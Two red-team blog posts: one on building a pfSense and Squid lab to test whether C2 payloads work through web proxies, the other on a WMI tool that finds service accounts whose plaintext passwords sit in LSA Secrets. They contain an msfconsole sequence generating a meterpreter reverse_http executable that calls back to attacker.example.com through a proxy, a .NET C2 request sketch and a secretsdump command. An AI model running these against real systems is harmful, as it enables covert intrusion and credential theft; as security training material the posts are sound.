Saturday, September 21, 2019

Proxy-Aware Payload Testing


TL;DR:


I get told that I am too wordy, so if you just want the summary: here are the steps to set up a virtual testing environment for checking whether payloads can handle HTTP(S) proxies and, if so, whether they can also authenticate through them. This post covers the proxy setup without authentication, since that is the easier part; I will do a second post shortly to hack together the authentication portion.

Skip down to the actual setup here if you want to skip the fluff.

Introduction:


There have been times in my red teaming and pentesting experience that I have run into networks where direct outbound traffic to the internet (or in some cases out of the subnet) is completely restricted. When I say direct, I mean that all DNS traffic first goes to an internal DNS server, all web traffic goes through an internal proxy, email to an internal SMTP/IMAP server, etc. Traffic from a client workstation directly to any internet IP address is dropped, whether TCP, UDP, or ICMP. For the blue teamers reading this post, this is something I highly recommend pushing for in your environment if it is not already the case. This not only allows for better monitoring but also breaks a large amount of commodity malware (and some red team tools). It is one of my favorite incidental preventative controls.

In these cases, we need tools that can communicate out in an indirect manner. A plain TCP reverse shell or default meterpreter payload is no longer an option. Even meterpreter HTTP(S) payloads with default settings will be blocked, since they don’t try to use a proxy by default.

There are times when I might consider C2 over DNS or SMTP, but DNS can be loud and SMTP somewhat complicated. For this purpose, I often look to C2 tools that can communicate over HTTP and either handle proxies by default or provide configuration options that let you set proxy settings for the payload.

I don’t plan to go through all of the C2 tools out there and talk about how they handle (or can be made to handle) HTTP proxies, but I will quickly highlight some different scenarios to show why having an environment to test all parts of a proxy connection may be useful to C2 developers and the users of those tools.

Meterpreter:


By default, payload/windows/meterpreter/reverse_http and similar payloads are not proxy aware. These payloads attempt to connect directly to the IP address set for LHOST, or resolve the hostname set for LHOST and then connect directly to that IP address. Only once a TCP connection is established does the traffic sent over that connection become HTTP.

If direct outbound connections are blocked in your target environment, the initial TCP connection will fail and you will not get your shell. Sad day…

All is not lost, though, if you really want to use meterpreter over HTTP in this environment and you have already gained access to some information. The payload/windows/meterpreter/reverse_http and similar Windows payloads have the following advanced options available:
-       HttpProxyHost
-       HttpProxyPass
-       HttpProxyPort
-       HttpProxyUser
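If you already have the proxy details, setting these options in msfconsole looks something like the following. The host, port, and credentials here are hypothetical placeholders, and the exact generate syntax may vary between Metasploit versions:

```
msf5 > use payload/windows/meterpreter/reverse_http
msf5 payload(windows/meterpreter/reverse_http) > set LHOST attacker.example.com
msf5 payload(windows/meterpreter/reverse_http) > set LPORT 80
msf5 payload(windows/meterpreter/reverse_http) > set HttpProxyHost 192.168.1.5
msf5 payload(windows/meterpreter/reverse_http) > set HttpProxyPort 3128
msf5 payload(windows/meterpreter/reverse_http) > set HttpProxyUser jsmith
msf5 payload(windows/meterpreter/reverse_http) > set HttpProxyPass Summer2019!
msf5 payload(windows/meterpreter/reverse_http) > generate -f exe -o proxy_shell.exe
```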


By setting these options, we can get meterpreter to connect out through an internal web proxy. But how do we get this information? We would have to have already compromised a system, phished a user, found it exposed in code or config files on public sources, or obtained it through some other information disclosure. One place I have used this is when simulating a knowledgeable insider. Metasploit is one of the most popular public “hacking” tools, so to simulate someone who wants to “hack” their own company, I assumed insider knowledge of their own credentials and the proxy configuration, set those in the payload, and used meterpreter to get an external shell. Another situation has been finding proxy settings in code posted to public GitHub repositories. Developers love to create configuration files that set the proxy settings so that their applications can get out through the proxies like they can.

So, although meterpreter supports proxies and authentication, it does not handle them by default and requires some prior knowledge of the environment to use. I have seen similar results with many C2s that work on Mac OS or Linux, such as EmPyre.

Some other tools or payloads currently do not support proxying HTTP payloads at all. One example would be the meterpreter payloads for Mac OS: the HttpProxy* options mentioned for the Windows meterpreter payloads are not accepted by the Mac OS payloads.

PowerShell Empire and Cobalt Strike:


PowerShell Empire and Cobalt Strike work a little bit differently. They use libraries such as .NET’s System.Net.CredentialCache to ask the system to apply the process’s current proxy settings and net credentials to the HTTP request. This allows the HTTP connection to be properly proxied the same way the current process would normally proxy web traffic. I keep saying process rather than user because that can be a pretty important distinction in certain situations. If your process is running as SYSTEM (and you haven’t impersonated a user), then your net credentials will be the credentials of the host computer and not an AD user. Unless computer accounts are allowed to authenticate through the proxy, this traffic will be denied, and your payload won’t get out. There have been many times where I have used privilege escalations or PsExec to spawn new beacons or agents and struggled to figure out why I wasn’t getting callbacks. Most of the time, this was because I was being denied at the proxy.
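A minimal .NET sketch of this pattern, assuming a hypothetical C2 URL; the key lines are the ones pulling the system default proxy and the process’s default network credentials:

```csharp
using System;
using System.Net;

class ProxyAwareRequest
{
    static void Main()
    {
        // Hypothetical C2 endpoint, used for illustration only
        var request = (HttpWebRequest)WebRequest.Create("http://c2.example.com/index.aspx");

        // Use whatever proxy the current process would use for web traffic
        request.Proxy = WebRequest.GetSystemWebProxy();

        // Authenticate to the proxy as the current process identity.
        // If the process runs as SYSTEM, these are the machine account's
        // credentials, not a user's, which is why SYSTEM-level beacons
        // often get denied at the proxy.
        request.Proxy.Credentials = CredentialCache.DefaultCredentials;

        using (var response = (HttpWebResponse)request.GetResponse())
        {
            Console.WriteLine(response.StatusCode);
        }
    }
}
```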

In these situations, there are a few options. Assuming we have already compromised the host, we can do what we did with meterpreter and hard-code these settings to override the defaults. This way, we have a SYSTEM-level shell but are using a user’s credentials and proxy settings to send traffic out. The other option is to use something like Cobalt Strike’s SMB beacon to create an internal C2 channel and link to those beacons from your HTTP beacon.



How Do We Test This:



How would we test this? Do we need to build a full domain-configured network? Do we need a complex proxy setup? I thought so at first and put this project off for a long time, but I eventually dove in and tried it. What I learned was that setting up a network with a proxy that didn’t check authentication was extremely easy and served as a good test environment for most of the situations I came across. When I decided that I needed to test authentication as well, things became a bit trickier; I will write a second post soon covering that configuration.

Building the Network:


Note: I was using VMware Fusion for my setup, but the steps should be very similar for something else such as VirtualBox.

For this setup to work, we need to ensure that our test host cannot call directly out to the internet. This could be done with host-based firewalls or iptables, but I didn’t want to make a bunch of configuration changes on each host that I wanted to test. I wanted to build a network that I could attach a virtual machine to and have it just work (kind of… I’ll talk about the specifics in the authentication part of the proxy setup).

Here is a diagram of the network we are building:

To accomplish the port restrictions and web proxy, I built two virtual machines:
-       pfSense Firewall
        -   Hardware
            -   1 core
            -   256 MB RAM
            -   8 GB disk (probably excessive)
            -   2 network adapters
                -   WAN – ‘Share with my Mac’
                -   LAN – ‘SimpleProxyNet’ (see below)
        -   Software
            -   Nothing additional, no addons
-       Ubuntu Server
        -   Hardware
            -   2 cores
            -   1 GB RAM
            -   16 GB disk (again, probably excessive)
            -   1 network adapter – ‘SimpleProxyNet’ (see below)
        -   Software
            -   Added Squid proxy software

For the networking setup, I created a network in VMware and unchecked the box that allows the network to connect to external networks. I wanted this network to be internal only. This will be the network that I attach my test VM and the proxy to.

Before starting either VM, I attached the network interfaces to the appropriate networks.

Setting Up pfSense:


I am not going to go into too many details on this one but rather include a screenshot of a couple of settings and a couple of tips that I learned along the way. There are many guides for setting up pfSense and I didn’t stray off the beaten path for this. For more info on getting started with pfSense, check out this link: https://www.vgemba.net/vmware/pfSense-VMware-Workstation/.

Some tips:
-       On the LAN interface, I did not set VMware to handle DHCP in anticipation of using pfSense for that purpose.
-       Keeping track of which interface is which can be a little tricky, but usually “Network Adapter” will be em0 or the WAN and “Network Adapter 2” will be em1 or the LAN.
-       Once you add a LAN interface, the management web portal will default to the internal network. I used my victim VM to browse to this management interface once I attached it to the network. You can also use your host OS if it is able to communicate on this network.
-       Since pfSense is handling DHCP, I tend to start this VM first and make sure it is fully booted before starting up the proxy or attaching any victim VMs.

Setting Up Squid Proxy:


Before adding any firewall rules, we want to set up our Squid proxy. We do this first because we want to create firewall rules that allow the proxy to call out to the internet, but we don’t want any other hosts on SimpleProxyNet to be able to do so.

Setting up the Squid proxy without forcing user authentication was actually much easier than I expected, so I am not going to go into too many details on this setup either. I just set up a vanilla Ubuntu Server 18.04, used apt to install Squid, and set a static IP address in the OS (in my case, 192.168.1.5). I followed a guide all the way up to the point where they add authentication. A guide such as this one could be useful: https://linuxize.com/post/how-to-install-and-configure-squid-proxy-on-ubuntu-18-04/.

Finally, I set up the ACLs to allow the SimpleProxyNet subnet to connect to the proxy and moved on to the firewall rules on the pfSense.
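For reference, the relevant portion of /etc/squid/squid.conf ends up looking roughly like this (the ACL name is arbitrary, and the subnet matches my SimpleProxyNet addressing; adjust to yours):

```
# Define the internal-only test network
acl simpleproxynet src 192.168.1.0/24

# Allow hosts on that network to use the proxy
http_access allow simpleproxynet

# Deny everything else
http_access deny all

# Default Squid listening port
http_port 3128
```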

Firewall Rules:


With the proxy and firewall built, we need to connect a system to this network and configure the firewall rules. I created a Windows VM that would serve as my victim and attached it to the SimpleProxyNet network.

To access the pfSense web UI, I used my victim Windows VM: I attached its network interface to the SimpleProxyNet network, opened a web browser to http(s)[:]//[IP of pfSense]/, and logged in with the credentials I set when first configuring the pfSense (the default is admin:pfsense). Once logged in, I went to the firewall settings and configured the LAN rules to allow the IP address of the Squid proxy to communicate outbound on 53/DNS, 80/HTTP, and 443/HTTPS:


These settings prevent the victim VM from being able to connect directly out to the internet as only the Squid proxy traffic is allowed.
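Sketched out, the LAN rule set I described looks something like this (192.168.1.5 is my Squid server’s static address; your addressing may differ):

```
Action  Interface  Proto    Source       Destination  Ports
Pass    LAN        TCP/UDP  192.168.1.5  any          53  (DNS)
Pass    LAN        TCP      192.168.1.5  any          80  (HTTP)
Pass    LAN        TCP      192.168.1.5  any          443 (HTTPS)
Block   LAN        any      any          any          any
```

Note that traffic between the victim VM and the proxy stays inside the SimpleProxyNet subnet, so it never crosses the firewall and needs no rule.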

Note: The ports from the proxy have been limited to 80, 443, and 53. This is a common situation but not necessarily the way all proxies are set up. In this case, your C2 channels would be limited to calling back on one of these three ports. Some proxies in client environments are allowed out on any port to accommodate web services that run on other ports, such as 8080. If you want to test in this fashion, you can alter your rules to allow it and see how your tools behave (proxying SSH can be a fun one if you can figure it out).

Once you have the firewall rules set, your proxy set up, and your victim VM connected, we just need to go to the victim VM and configure it to know about the proxy. Once this is done, we should have an unauthenticated proxied network set up and ready for testing payloads.


Setting the Proxy Settings on the Victim VM:



For this section, I am only going to go into the setup for modern Windows hosts and not worry about *nix hosts. This is something that is quickly and easily searchable on the internet.

Open the Start Menu and find the Internet Options settings menu. Once opened, go to the Connections tab and click on the LAN settings button. Uncheck the Automatically detect settings checkbox (this is for WPAD, something beyond the scope of this post) and check the Use a proxy server for your LAN checkbox. Enter the IP address of your Squid proxy server (in my case 192.168.1.5) and port (default for Squid is 3128).
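If you would rather script this than click through the UI, the same per-user WinINET settings can be written to the registry (values here match my lab proxy; adjust to yours):

```
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /t REG_SZ /d "192.168.1.5:3128" /f
```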


Click the OK button on each menu to save the settings. Pop open a web browser and try to browse the internet to confirm that the proxy is working. You should be all set up and ready to test your payloads for proxy-awareness.


Tuesday, August 20, 2019

Finding Hidden Treasure on Owned Boxes: Post-Exploitation Enumeration with wmiServSessEnum


TLDR: We can use WMI queries to enumerate accounts configured to run any service on a box (even non-started / disabled), as well as perform live session enumeration.  Info on running the tool is in the bottom section.


Background


On a recent engagement I had gotten local admin privileges on ~20 boxes, and after querying active sessions on them turned up nothing interesting, I was ready to look for other potential escalation paths.  I ran secretsdump against several of the systems to grab local account hashes and found that, in the process, I had also obtained plaintext credentials for a domain account that was not mentioned in any of the session enumeration information I had pulled.  This got me thinking about how this was possible, and how I could more reliably hunt for similar configurations on other systems where I could remotely execute code.

First, to explain what was going on: the NetWkstaUserEnum WINAPI function used by the majority of session enumeration tools is great at what it does, but it only pulls data for active sessions on the remote system (interactive, service, and batch logins).  If a service is configured on the system but is not currently running, it will not be listed as a current session when enumerating the system.  This makes sense, as a non-running service has no processes associated with it.  After further investigation of the systems in question, I validated that this is indeed what happened: each of the systems was configured with a stopped service that would run using non-default credentials.

I’ve included an example below showing this in practice on a lab system using the GetNetLoggedOnUsers() functionality of @Cobbr_io’s SharpSploit, which uses the NetWkstaUserEnum WINAPI function to query sessions on a remote system, and a test service I configured (TestService) to run as the local ‘admin’ user on the box.  It shows that when the service is not running, the admin user is not enumerated (as expected):



For a bit more context on why this matters to us at all, we have to take a look at how credentials for service accounts are cached by Windows.  When a service is configured with a set of credentials to run as, the OS needs to store them so they don’t have to be re-entered every reboot / every time the service is run.  Windows stores these service account credentials within the HKEY_LOCAL_MACHINE\Security registry hive, in an encrypted storage space known as LSA Secrets.  However, the passwords themselves, although encrypted, are stored as plaintext values (as opposed to NTLM hashes).  Items stored in this space are only readable by NT AUTHORITY\SYSTEM by default, but users with administrative rights on the system can create a backup of the registry hive that can subsequently be accessed and decrypted to extract the data contained within.  As the screengrab below shows, the credentials are sitting in LSA Secrets, ready to be used whenever next needed.


And if we dump the contents of LSA secrets, we see we can actually retrieve the plaintext password for the account configured to run the service:
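Remotely, this dump is typically done with something like Impacket’s secretsdump (the domain, credentials, and target below are placeholders); service account secrets show up in the output under entries named after the service, in the form _SC_&lt;ServiceName&gt;:

```
secretsdump.py 'LAB/admin:Password123@192.168.1.10'
```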


So at this point I was a bit stumped: how could I quickly and reliably enumerate accounts configured to run services on a relatively large number of remote systems?  It’s not really a best practice to start randomly secretsdumping boxes, and even if you threw opsec concerns to the wind, it would still take a relatively long time to dump anything more than just a few systems.  With that in mind, I wanted something that would ideally be agentless and could be run in a multi-threaded process to increase collection speed against multiple systems. I settled on writing something to check these boxes in C#, primarily because that’s where I’ve been doing the majority of my development lately.



Building the Tool



Note: This section doesn’t have anything critical on the functionality or usage of the tool, but instead outlines the development process and roadblocks I ran into as I built it.  If this doesn’t interest you, I recommend scrolling through to the next section.

When I first sat down to write this tool, I thought WMI would be a good candidate for collection, as I had some knowledge of the Win32_Service class and figured it would be pretty easy to pull the needed information from the remote system.  As I prepared to start coding, I checked out similar projects that implemented WMI connectivity in .NET applications.  From an offensive tooling standpoint, I didn’t find much outside of tools designed to facilitate code execution, and overwhelmingly they appeared to use the older System.Management namespace to build their WMI objects. In my reading of the Microsoft docs, I found that the newer Microsoft.Management.Infrastructure namespace is recommended for accessing WMI.


As I began to build out the functionality of the tool and started exploring other WMI classes I figured it would make sense to extend the tool’s functionality to also include the optional enumeration of sessions on the system via WMI, similar to the sessionEnum functionality seen earlier through SharpSploit.  To explore various WMI classes I used WMI Explorer (https://github.com/vinaypamnani/wmie2/releases) which provides a super helpful interface that allows you to browse WMI classes and get information on specific properties & methods.


Through this I found the Win32_LoggedOnUser WMI class.  At first it seemed like exactly what was needed for enumerating active sessions, and my initial tests worked great: I log in with user1, user1 shows up when I query the class; I log in with user2, user1 and user2 now show up when I query the class.  The issue came when I logged off with user2 and queried the class again: user2 still showed up as having a session on the system.  I tried giving it a few minutes, thinking that the session was temporarily cached on log-off, but user2 still appeared to be logged in.  This led me to a bunch of googling and the unfortunate conclusion that the Win32_LoggedOnUser class tracks ALL login sessions since the last reboot, including ‘stale’ sessions that no longer exist.  This isn’t great for us, as these stale sessions do not retain cached credentials in memory by default, potentially leading to a plethora of false positives based on old logins.  There are definitely operational uses for this information, e.g. looking for a system where there have been administrative logins at some point since the last reboot – likely within the past month – and targeting it for long-term surveillance or persistence, with the theory being that an admin may log in there again; however, those uses are outside the scope of this tool.

The array of session objects returned when querying the Win32_LoggedOnUser class have two properties: an antecedent, and a dependent.  The antecedent is the value that contains the ‘human-readable’ information regarding a specific session – the hostname, domain, etc.  The dependent contains a ‘loginID’ value, a unique int corresponding to the specific instance of an account logging into the system.  If a single user logs in & out multiple times prior to a reboot, each instance will receive a unique loginID and thus be tracked independently by the Win32_LoggedOnUser class. 
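To make the antecedent/dependent relationship concrete, a single Win32_LoggedOnUser association instance looks roughly like this (domain, account name, and LogonId are illustrative values):

```
Antecedent: \\.\root\cimv2:Win32_Account.Domain="LAB",Name="admin"
Dependent:  \\.\root\cimv2:Win32_LogonSession.LogonId="999912"
```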


There wasn’t a whole lot I could do directly with the LoggedOnUser class to filter to only live sessions, but through a bit more exploration of WMI classes I landed on the Win32_SessionProcess class.  Similarly to LoggedOnUser, this class also only returns an antecedent and a dependent.  However, the antecedent and dependent values returned for objects of the SessionProcess class are different, with the antecedent containing the LoginID tied to each active process on the system and the dependent containing a handle to each of these processes.  Although by themselves there isn’t much that can be done with these values, the LoginID returned by SessionProcess can be cross-referenced against the LoginIDs associated with LoggedOnUser objects, giving a listing of actual logins (those that have at least one running process associated with their loginID).
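A rough sketch of this cross-referencing logic using Microsoft.Management.Infrastructure follows; this is not the tool’s actual code, the target IP is a placeholder, and error handling is omitted:

```csharp
using System;
using System.Collections.Generic;
using Microsoft.Management.Infrastructure;

class LiveSessionEnum
{
    static void Main()
    {
        // Placeholder target; a real run would take this as an argument
        CimSession session = CimSession.Create("192.168.1.10");

        // Collect the LoginIDs that have at least one running process
        var liveLogonIds = new HashSet<string>();
        foreach (CimInstance sp in session.QueryInstances(@"root\cimv2", "WQL",
            "SELECT * FROM Win32_SessionProcess"))
        {
            // Antecedent is a reference to the Win32_LogonSession
            var logonSession = (CimInstance)sp.CimInstanceProperties["Antecedent"].Value;
            liveLogonIds.Add(logonSession.CimInstanceProperties["LogonId"].Value.ToString());
        }

        // Only report LoggedOnUser entries whose LoginID has a live process
        foreach (CimInstance lu in session.QueryInstances(@"root\cimv2", "WQL",
            "SELECT * FROM Win32_LoggedOnUser"))
        {
            var logonSession = (CimInstance)lu.CimInstanceProperties["Dependent"].Value;
            string logonId = logonSession.CimInstanceProperties["LogonId"].Value.ToString();
            if (!liveLogonIds.Contains(logonId)) continue;

            // Antecedent is a reference to the Win32_Account
            var account = (CimInstance)lu.CimInstanceProperties["Antecedent"].Value;
            Console.WriteLine("{0}\\{1}",
                account.CimInstanceProperties["Domain"].Value,
                account.CimInstanceProperties["Name"].Value);
        }
    }
}
```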


Once this connection had been made, it was fairly straightforward to get session enumeration functionality up and running.  From there, everything was pretty much in its final state as far as functionality goes.  Things were looking good until I started using Wireshark to watch execution across the wire in real time.  When enumerating sessions using the NetWkstaUserEnum WINAPI function, approximately 15 packets were sent over the wire.  When running session enumeration over WMI, that number was up to ~200 packets.  Quite a bit larger, but that makes sense considering that a session has to be set up and multiple requests have to be made (although if anyone can update the queries to shave this number further, I would be happy to include the change).  However, when I ran service enumeration, packet counts shot up to a monstrous ~1700 per host.  This was simply too high for my liking, and I could imagine network congestion, downed boxes, etc. if this were run against too many hosts in parallel.




The breakthrough in getting the amount of traffic sent over the wire down was the realization that the WQL query sent to retrieve objects is processed server-side.  WMI connectivity using the Microsoft.Management.Infrastructure namespace involves creating a CimSession to a remote host, which in turn is queried using a WQL (WMI Query Language) query, a SQL-like statement that retrieves data based on certain criteria.  I had (mistakenly) assumed that filters applied to these queries (ex. select * from Win32_Service where startname like ‘%admin%’) would be applied after the data was returned to our system; in other words, all the data would be pulled back across the wire and then filtered using the given rules prior to displaying.  Luckily, I found this not to be the case: the entire query is sent to the remote host, where it is processed, and only results that match the given filter are sent back over the wire to our system.  Almost all services can be filtered out, as we’re not interested in those running under ‘default’ accounts such as SYSTEM, LOCAL SERVICE, and NETWORK SERVICE. With these new filters applied, traffic for service enumeration is down to a much more manageable ~170 packets per host (varying with the number of services identified).
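The filtered service query ends up looking something like the following (exact account-name patterns may vary by locale and OS version), so the remote host only sends back services running under non-default accounts:

```sql
SELECT Name, StartName, State FROM Win32_Service
WHERE StartName IS NOT NULL
  AND NOT StartName LIKE '%LocalSystem%'
  AND NOT StartName LIKE '%LocalService%'
  AND NOT StartName LIKE '%NetworkService%'
```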


One other interesting point became apparent as I analyzed traffic from both WMI and API-based enumeration methods: the WMI method uses solely RPC connections, whereas the API methods use SMB to remotely pull information.  There are definitely improvements that can be made here as well: API methods would likely be faster and may be even lighter from a network traffic perspective (depending on what filtering can be done prior to returning service information), and the current queries could likely be refined to reduce traffic further. Overall though, with this last hurdle overcome, I figured the tool was in a decent enough place to release.


wmiServSessEnum Usage


Like other tools that use WMI to connect to other systems, admin rights are required on the remote system.

An IP or a comma-separated list of IPs must be provided on the command line when executing the tool, or a reference to a file on the local system containing one target IP per line.  I looked into incorporating CIDR notation into the tool but ultimately decided against it, so as of now only specific IP addresses are supported.  Ideally this shouldn’t be a huge deal, as the addresses being tested are ones you already have valid credentials for, meaning initial network enumeration has already occurred.

By default the tool will use the credentials your current session is running as, but it also accepts username + domain + plaintext password (use a domain of ‘.’ for a local user).

WmiServSessEnum can be run in several different modes:
-       sessions – similar to other user enumeration methods; returns a list of active sessions on the remote system
-       services – returns a list (if any) of non-default accounts configured to run services on the remote system
-       all (default) – runs both

Flags should be entered in the format –u=UserName, etc.
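Putting that together, a hypothetical invocation might look like the line below. The –u flag format comes from the tool’s documented convention; the other flag names and values here are illustrative placeholders, so check the tool’s help output for the real ones:

```
WmiServSessEnum.exe 192.168.1.10,192.168.1.11 -u=admin -p=Password123 -d=. -m=all
```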

When everything works you should get something back that looks like this when running against a remote system: